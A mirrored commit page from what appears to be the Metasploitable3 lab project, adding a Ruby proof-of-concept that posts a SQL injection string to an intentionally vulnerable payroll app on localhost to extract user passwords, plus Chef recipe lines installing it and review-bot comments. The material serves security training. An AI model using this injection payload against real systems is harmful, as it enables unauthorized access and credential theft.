mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-06-30 16:55:50 +02:00
Add poc for sql injection.
parent
dc8ffbcec6
commit
bc8fb88017
|
@ -38,6 +38,7 @@ if($_POST['s']){
|
|||
foreach ($keys as $key) {
|
||||
echo "<td>" . $row[$key] . "</td>";
|
||||
}
|
||||
echo "</tr>\n";
|
||||
}
|
||||
$result->free();
|
||||
}
|
||||
|
|
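--- /dev/null
+++ b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
@@ -0,0 +1,14 @@
+require 'net/http'
+
+url = "http://127.0.0.1/payroll_app.php"
+uri = URI(url)
+user = 'luke_skywalker'
+injection = "password'; select password from users where username='' OR ''='"
+
+puts "Making POST request to #{uri} with the following parameters:"
+puts "'user' = #{user}"
+puts "'password' = #{injection}"
+res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
+
+puts "Response body is #{res.body}"
+puts "Done"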
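Review bot: poc.rb has no interpreter line, but the recipe in this same commit installs it with `mode '0755'`, so running it as `./poc.rb` hands the file to the shell instead of Ruby; add `#!/usr/bin/env ruby` as line 1 or drop the execute bit. The script prints `res.body` without reporting the HTTP status, so an error page and a real result look alike in the output; `puts "Status: #{res.code}"` before the body line would fix that. A short header comment stating that the script exercises the intentionally vulnerable payroll app on the lab VM's loopback address, and what a successful run demonstrates, would make the file self-explanatory.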
|
@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
|
|||
mode '0755'
|
||||
end
|
||||
|
||||
directory '/home/vagrant/poc/payroll_app/' do
|
||||
mode '0755'
|
||||
owner 'vagrant'
|
||||
recursive true
|
||||
end
|
||||
|
||||
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
|
||||
source 'payroll_app/poc.rb'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
bash 'create payroll database and import data' do
|
||||
code <<-EOH
|
||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
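Review bot: In the new `directory '/home/vagrant/poc/payroll_app/'` resource, `recursive true` makes Chef apply `owner` and `mode` only to the leaf directory, so the intermediate `/home/vagrant/poc` is presumably created owned by whatever user runs Chef (likely root) rather than vagrant. Declaring `/home/vagrant/poc` as its own `directory` resource with `owner 'vagrant'` ahead of this one would keep both levels consistent. The new `cookbook_file` for poc.rb sets `mode '0755'` but no owner, so the script ends up owned differently from the directory that holds it; adding `owner 'vagrant'` would match the `directory` block. The `bash` resource at the end of the hunk continues outside it.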
|
||||
|
|